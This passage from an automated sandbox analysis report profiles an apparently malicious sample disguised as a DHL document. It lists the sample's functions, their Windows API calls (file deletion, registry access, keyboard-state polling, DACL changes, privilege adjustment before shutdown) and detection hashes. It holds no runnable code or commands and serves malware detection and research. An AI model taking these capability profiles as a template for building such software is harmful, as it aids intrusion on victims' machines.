                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$ConnectCreateRegistryValue
                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                    • API String ID: 536824911-966354055
                                                                                    • Opcode ID: 4ccd266bd330cf843de91c7044dc8eae4b9a819b7c78a50df641581f43d29e14
                                                                                    • Instruction ID: 03911400d61299ec1867987e96e2c44d4707ba577ffa0867f37da2c4a08b1fb0
                                                                                    • Opcode Fuzzy Hash: 4ccd266bd330cf843de91c7044dc8eae4b9a819b7c78a50df641581f43d29e14
                                                                                    • Instruction Fuzzy Hash: AE022475604601DFCB14EF28C859E6AB7E5FF89314F048959F99A9B3A2DB34EC01CB81
                                                                                    Function 0081F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0081F113
                                                                                    • _wcscmp.LIBCMT ref: 0081F128
                                                                                    • _wcscmp.LIBCMT ref: 0081F13F
                                                                                      • Part of subcall function 00814385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 008143A0
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0081F16E
                                                                                    • FindClose.KERNEL32(00000000), ref: 0081F179
                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0081F195
                                                                                    • _wcscmp.LIBCMT ref: 0081F1BC
                                                                                    • _wcscmp.LIBCMT ref: 0081F1D3
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0081F1E5
                                                                                    • SetCurrentDirectoryW.KERNEL32(00868920), ref: 0081F203
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0081F20D
                                                                                    • FindClose.KERNEL32(00000000), ref: 0081F21A
                                                                                    • FindClose.KERNEL32(00000000), ref: 0081F22C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                    • String ID: *.*
                                                                                    • API String ID: 1824444939-438819550
                                                                                    • Opcode ID: 9c4a0d282b468de80c4bb96c78afe02cfdf3a8c624308e792baae949f672a5f4
                                                                                    • Instruction ID: 25f17b09f751f506e336f4f644340b5bfcbacb591188b30e79c0f641e783d865
                                                                                    • Opcode Fuzzy Hash: 9c4a0d282b468de80c4bb96c78afe02cfdf3a8c624308e792baae949f672a5f4
                                                                                    • Instruction Fuzzy Hash: 8B31C736900219BADB109B74EC59EEE77ACFF85360F100575FA14E31A2DB34DE85CA94
                                                                                    Function 0081A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0081A20F
                                                                                    • __swprintf.LIBCMT ref: 0081A231
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0081A26E
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0081A293
                                                                                    • _memset.LIBCMT ref: 0081A2B2
                                                                                    • _wcsncpy.LIBCMT ref: 0081A2EE
                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0081A323
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0081A32E
                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 0081A337
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0081A341
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                    • String ID: :$\$\??\%s
                                                                                    • API String ID: 2733774712-3457252023
                                                                                    • Opcode ID: f80b16e40dec9c2407cb35a440f75273bf5c91355384c2e3291df336dc4c9ec8
                                                                                    • Instruction ID: 2a6e022082a1d07941f790df68e077179299781967e07bcc095553c8c03d1985
                                                                                    • Opcode Fuzzy Hash: f80b16e40dec9c2407cb35a440f75273bf5c91355384c2e3291df336dc4c9ec8
                                                                                    • Instruction Fuzzy Hash: E331B4B5900109ABDB21DFA0DC49FEB77BCFF88740F1041B6FA18D2261EB7496858B65
                                                                                    Function 00807CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00808202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0080821E
                                                                                      • Part of subcall function 00808202: GetLastError.KERNEL32(?,00807CE2,?,?,?), ref: 00808228
                                                                                      • Part of subcall function 00808202: GetProcessHeap.KERNEL32(00000008,?,?,00807CE2,?,?,?), ref: 00808237
                                                                                      • Part of subcall function 00808202: HeapAlloc.KERNEL32(00000000,?,00807CE2,?,?,?), ref: 0080823E
                                                                                      • Part of subcall function 00808202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00808255
                                                                                      • Part of subcall function 0080829F: GetProcessHeap.KERNEL32(00000008,00807CF8,00000000,00000000,?,00807CF8,?), ref: 008082AB
                                                                                      • Part of subcall function 0080829F: HeapAlloc.KERNEL32(00000000,?,00807CF8,?), ref: 008082B2
                                                                                      • Part of subcall function 0080829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00807CF8,?), ref: 008082C3
                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00807D13
                                                                                    • _memset.LIBCMT ref: 00807D28
                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00807D47
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00807D58
                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00807D95
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00807DB1
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00807DCE
                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00807DDD
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00807DE4
                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00807E05
                                                                                    • CopySid.ADVAPI32(00000000), ref: 00807E0C
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00807E3D
                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00807E63
                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00807E77
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3996160137-0
                                                                                    • Opcode ID: 28c071b7baacfa6a124e97e925a49a9866fbd45c98f08ff50bc7dc45734029fa
                                                                                    • Instruction ID: 181221c39bd7d170321154ac9ec53c5ddf82aeb3abacb961bedc2ff44a7c1e46
                                                                                    • Opcode Fuzzy Hash: 28c071b7baacfa6a124e97e925a49a9866fbd45c98f08ff50bc7dc45734029fa
                                                                                    • Instruction Fuzzy Hash: F3617970D04209EFDF44DFA4DC84AAEBB79FF44B00F008569E915E6292DB30AA05CBA0
                                                                                    Function 007C66E1 Relevance: 20.9, Strings: 16, Instructions: 889COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 3c|$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$_|
                                                                                    • API String ID: 0-108275193
                                                                                    • Opcode ID: cde0a6d416e7106dd70bdcec84be647a86dc855d8ad51b5956ffea2c8b558b98
                                                                                    • Instruction ID: 094521341725c5b6d4952d30e46d22c61dc34cf57e018c8dd9d5fae27a8ef214
                                                                                    • Opcode Fuzzy Hash: cde0a6d416e7106dd70bdcec84be647a86dc855d8ad51b5956ffea2c8b558b98
                                                                                    • Instruction Fuzzy Hash: E2724E75E00219DBDF64CF58C884BAEB7B5FF44720F14816EE949EB291EB349981CB90
                                                                                    Function 0081001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?), ref: 00810097
                                                                                    • SetKeyboardState.USER32(?), ref: 00810102
                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00810122
                                                                                    • GetKeyState.USER32(000000A0), ref: 00810139
                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00810168
                                                                                    • GetKeyState.USER32(000000A1), ref: 00810179
                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 008101A5
                                                                                    • GetKeyState.USER32(00000011), ref: 008101B3
                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 008101DC
                                                                                    • GetKeyState.USER32(00000012), ref: 008101EA
                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00810213
                                                                                    • GetKeyState.USER32(0000005B), ref: 00810221
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: State$Async$Keyboard
                                                                                    • String ID:
                                                                                    • API String ID: 541375521-0
                                                                                    • Opcode ID: e6a4b8515a922ce6952feb30eaaf66c8c962aeaf0b6e466bcf359ab3af970f91
                                                                                    • Instruction ID: aede9029da5a0ad384faee51b54d3b6103b651792bc10b17842f9e5209ff2c4e
                                                                                    • Opcode Fuzzy Hash: e6a4b8515a922ce6952feb30eaaf66c8c962aeaf0b6e466bcf359ab3af970f91
                                                                                    • Instruction Fuzzy Hash: 2451B92090478869FB35D7648C547EABFB8FF01380F08459995C2DA5C3DAE89ACCCF62
                                                                                    Function 008303DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00830E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0082FDAD,?,?), ref: 00830E31
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008304AC
                                                                                      • Part of subcall function 007B9837: __itow.LIBCMT ref: 007B9862
                                                                                      • Part of subcall function 007B9837: __swprintf.LIBCMT ref: 007B98AC
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0083054B
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 008305E3
                                                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00830822
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0083082F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 1240663315-0
                                                                                    • Opcode ID: 41ceaccd4cf911bb62ee338e51e14f1175beddd936c57c8320fb3f487d92b6e2
                                                                                    • Instruction ID: 7af06f6bbda90803baf130523ed6a3e55606b6267cd423993c183cde01bc93c1
                                                                                    • Opcode Fuzzy Hash: 41ceaccd4cf911bb62ee338e51e14f1175beddd936c57c8320fb3f487d92b6e2
                                                                                    • Instruction Fuzzy Hash: 18E13C31604204EFCB14DF28C895E6ABBE5FF89314F04896DF95ADB262DA34E901CF91
                                                                                    Function 00824164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                    • String ID:
                                                                                    • API String ID: 1737998785-0
                                                                                    • Opcode ID: 462ea4f05ef55111416b0cc96276102f6c57e3c3b81373d7f0261018eff7bec7
                                                                                    • Instruction ID: 119e149cd9d2dbddab09694e7a8ea2071466207b3532426a36178979089b3dc3
                                                                                    • Opcode Fuzzy Hash: 462ea4f05ef55111416b0cc96276102f6c57e3c3b81373d7f0261018eff7bec7
                                                                                    • Instruction Fuzzy Hash: 32219F35600214DFDB10AF24EC09B6A7BA8FF55710F10842AFA46DB2B2DB74AC51CB95
                                                                                    Function 008137EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007B4743,?,?,007B37AE,?), ref: 007B4770
                                                                                      • Part of subcall function 00814A31: GetFileAttributesW.KERNEL32(?,0081370B), ref: 00814A32
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 008138A3
                                                                                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0081394B
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 0081395E
                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0081397B
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0081399D
                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 008139B9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                    • String ID: \*.*
                                                                                    • API String ID: 4002782344-1173974218
                                                                                    • Opcode ID: 96e02d014fde1e447b03338f9e54e27e7f601e0228203c5efdf56490ff4dfc48
                                                                                    • Instruction ID: c2db151b5bf95f07fc72b484b1a44f60664e454c0f51a2f2b880ad53e30292b8
                                                                                    • Opcode Fuzzy Hash: 96e02d014fde1e447b03338f9e54e27e7f601e0228203c5efdf56490ff4dfc48
                                                                                    • Instruction Fuzzy Hash: 3D519B3180414CEACF05EBA0CA96AEDBB78FF51300F604069E402B7192EF356F49CBA1
                                                                                    Function 0081F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
                                                                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0081F440
                                                                                    • Sleep.KERNEL32(0000000A), ref: 0081F470
                                                                                    • _wcscmp.LIBCMT ref: 0081F484
                                                                                    • _wcscmp.LIBCMT ref: 0081F49F
                                                                                    • FindNextFileW.KERNEL32(?,?), ref: 0081F53D
                                                                                    • FindClose.KERNEL32(00000000), ref: 0081F553
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                    • String ID: *.*
                                                                                    • API String ID: 713712311-438819550
                                                                                    • Opcode ID: 79c9fe72d587129da8d4acfd6b8a51b0223e87e0064e9a2a03f7f9794446dfea
                                                                                    • Instruction ID: 3d117c58e288a187293b813cc6e8475413093b1e5efe834cd0d3988268c0346c
                                                                                    • Opcode Fuzzy Hash: 79c9fe72d587129da8d4acfd6b8a51b0223e87e0064e9a2a03f7f9794446dfea
                                                                                    • Instruction Fuzzy Hash: 13417C7190021ADFDF14EF64DC49AEEBBB8FF04310F144566E915E32A2EB349A85CB90
                                                                                    Function 007C3030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: __itow__swprintf
                                                                                    • String ID: 3c|$_|
                                                                                    • API String ID: 674341424-1588047251
                                                                                    • Opcode ID: e3f0b90baae9ec50f5b1b14c049647d87a432e5b1f44bf631859f985bba7dbaa
                                                                                    • Instruction ID: 07fe2c71a6928619d332ffd94c629c3ba4db2471e78c51dd5b7a96e085cc5fa4
                                                                                    • Opcode Fuzzy Hash: e3f0b90baae9ec50f5b1b14c049647d87a432e5b1f44bf631859f985bba7dbaa
                                                                                    • Instruction Fuzzy Hash: FF228A71608340DFD724DF24C885BAAB7E4BF84710F04891DFA9A97391DB39EA04CB92
                                                                                    Function 007C5760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove
                                                                                    • String ID:
                                                                                    • API String ID: 4104443479-0
                                                                                    • Opcode ID: 8629089cf564949693fcba03fe8f0ee4c24b1cc81248011424479f870f5dfa93
                                                                                    • Instruction ID: 3a7f33eaf809be077d1bba612719c4756079318bf3fc8b46b985cbef878d031d
                                                                                    • Opcode Fuzzy Hash: 8629089cf564949693fcba03fe8f0ee4c24b1cc81248011424479f870f5dfa93
                                                                                    • Instruction Fuzzy Hash: D0126770A00609DBDF04DFA5D986BEEB7B5FF48300F10856DE846E7290EB3AA951CB51
                                                                                    Function 00813B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007B4743,?,?,007B37AE,?), ref: 007B4770
                                                                                      • Part of subcall function 00814A31: GetFileAttributesW.KERNEL32(?,0081370B), ref: 00814A32
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00813B89
                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00813BD9
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00813BEA
                                                                                    • FindClose.KERNEL32(00000000), ref: 00813C01
                                                                                    • FindClose.KERNEL32(00000000), ref: 00813C0A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                    • String ID: \*.*
                                                                                    • API String ID: 2649000838-1173974218
                                                                                    • Opcode ID: f4a2bbb3d72421892eb56d108281fdab063da3d918084693af42ee206fa2f108
                                                                                    • Instruction ID: b084fed8688e2212173ac06027c2ea1693057e77d67153665d8fae972cd46944
                                                                                    • Opcode Fuzzy Hash: f4a2bbb3d72421892eb56d108281fdab063da3d918084693af42ee206fa2f108
                                                                                    • Instruction Fuzzy Hash: 9B316B71008385DBC305EB24D8999EFBBACBE91314F444E2DF4D592192EB25DA08CBA3
                                                                                    Function 008151BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 008087E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0080882B
                                                                                      • Part of subcall function 008087E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00808858
                                                                                      • Part of subcall function 008087E1: GetLastError.KERNEL32 ref: 00808865
                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 008151F9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
